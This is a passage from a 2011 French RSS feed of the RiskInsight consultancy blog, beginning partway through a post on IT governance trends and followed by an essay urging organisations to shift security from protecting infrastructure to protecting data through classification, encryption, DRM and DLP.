<p>La montée en puissance des réseaux sociaux, la multiplication des terminaux mobiles (smartphones, tablettes) et l’arrivée à maturité des magasins d’applications (Appstore, AndroidMarket, etc.) sont en train de faire une entrée significative dans le monde de l’entreprise après avoir révolutionné les usages privés. Ces nouveaux usages brouillent la frontière entre réseau d’entreprise et internet entre usage professionnel et privé. A l’inverse des années 90, les usagers deviennent souvent mieux équipés à titre personnel que professionnel.</p>
<h2>Des évolutions d’approche</h2>
<p>Tout d’abord, il y a l’arrivée progressive de la génération Y (née entre la fin des 1970’s et le début des 1990’s) à la tête des entreprises. Cela pèsera fortement sur les orientations informatiques. En parallèle, l’informatique verte restera un sujet clé d’autant que la réalisation d’investissements plus éco responsables deviendra un enjeu financier de taille, surtout face à l’inflation du prix de l’énergie.</p>
<h2>Quels impacts sur la gouvernance ?</h2>
<p>L’impact de toutes ces évolutions sur l’organisation et la gouvernance des DSI est indéniable et se traduit d’ores et déjà chez un certain nombre de nos clients par un renforcement des fonctions transverses de pilotage, missions régaliennes par définition impossibles à externaliser. Quelques exemples. Le pilotage de l’offre de service, très orienté ces dernières années autour des notions de catalogue de service et d’unité d’œuvre avec pour objectif de mieux expliquer les services offerts par la DSI se renforce fortement sur des aspects économiques avec en ligne de mire la mise en place d’une grille de tarifs comparable à des prix de marché. Le pilotage des budgets SI se professionnalise pour mieux maîtriser les dépenses IT et en démontrer la valeur aux métiers. Le pilotage du portefeuille de projets, bien que complexe à mettre en place, devient un incontournable pour assurer un alignement entre la stratégie des métiers et les projets SI. Préparer 2011, c’est pour nos clients savoir anticiper ces évolutions et analyser leurs impacts pour être en mesure d’améliorer leur performance économique et opérationnelle.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/02/des-evolutions-structurantes-pour-la-gouvernance-des-si/">Des évolutions structurantes pour la gouvernance des SI</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>2010 – 2011 : protéger les infrastructures ou protéger les données ?</title>
		<link>https://www.riskinsight-wavestone.com/2011/02/2010-2011-proteger-les-infrastructures-ou-proteger-les-donnees/</link>
		
		<dc:creator><![CDATA[Gérôme Billois]]></dc:creator>
		<pubDate>Fri, 25 Feb 2011 15:16:50 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[data protection]]></category>
		<category><![CDATA[données]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=80</guid>

					<description><![CDATA[<p>2010, une actualité riche pour la sécurité De nombreux incidents ont rythmé l’année. Deux cas ressortent particulièrement : Stuxnet, premier virus ciblant spécifiquement des équipements industriels, Wikileaks et la fuite de données gigantesque qui a touché les Etats-Unis. 2010 a...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/02/2010-2011-proteger-les-infrastructures-ou-proteger-les-donnees/">2010 – 2011 : protéger les infrastructures ou protéger les données ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>2010, une actualité riche pour la sécurité</h2>
<p>De nombreux incidents ont rythmé l’année. Deux cas ressortent particulièrement : Stuxnet, premier virus ciblant spécifiquement des équipements industriels, Wikileaks et la fuite de données gigantesque qui a touché les Etats-Unis. 2010 a également été une année où de nouveaux usages se sont développés! La virtualisation, qui est maintenant définitivement entrée dans les datacenters, le cloud computing, qui fait ses premières preuves ou encore les smartphones et autres tablettes avec des premiers déploiements métiers mais également des premiers usages innovants d’utilisation d’équipements personnels.</p>
<h2><span id="more-80"></span>Une nouvelle approche pour de nouveaux enjeux</h2>
<p><strong><br />
</strong>L’ensemble de ces évènements a aussi montré la limite des approches sécurité classiques. Celles-ci sont basées avant tout sur une protection de l’infrastructure du SI. Nous ajoutons des mécanismes de sécurité sur les différentes briques que sont le poste de travail, le réseau d’entreprise, l’accès Internet, voir le datacenter. Mais cette approche ne permet plus de répondre aux nouveaux enjeux ! En effet l’information est de moins en moins traitée sur les infrastructures de l’organisation. Elle est de plus en plus partagée, avec des partenaires et des clients, accédées depuis des équipements mobiles voir personnels, parfois encore traitées sur des systèmes aux contours plus ou moins connus comme dans le cadre du cloud computing.<br />
Une nouvelle stratégie de réponse doit être envisagée face à ces évolutions, une stratégie qui devra être basé sur un principe simple : protéger au plus près les informations les plus sensibles. En effet pour être efficace et pérenne la sécurité doit se rapprocher de l’information, voir être portée par l’information elle-même, pour pouvoir être mieux partagée tout en étant toujours sécurisée.</p>
<h2>Quelles en sont les conséquences ?</h2>
<p>Ceci nécessite de planifier des chantiers ambitieux, lié par exemple à la classification des informations les plus sensibles, à la mise en place de mécanismes de protections des données (chiffrement, DRM, DLP…) ou encore à l’inclusion des mesures de sécurité dans les applications (chiffrement, scellement, authentification, processus projet…). Bien entendu les fondamentaux de la gestion des identités jouent un rôle essentiel et devront être encore renforcés pour y ajouter la gestion des partenaires et des clients. Mais il faudra aussi faire évoluer les habitudes, en ayant un focus particulier sur les équipes en charge des applications au cœur de cette nouvelle problématique de protection.L’objectif de 2011 est de faire évoluer nos principes pour aller de la protection de l’infrastructure à une vraie protection des données. Voici une année qui s’annonce donc riche en projets et en challenge !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/02/2010-2011-proteger-les-infrastructures-ou-proteger-les-donnees/">2010 – 2011 : protéger les infrastructures ou protéger les données ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
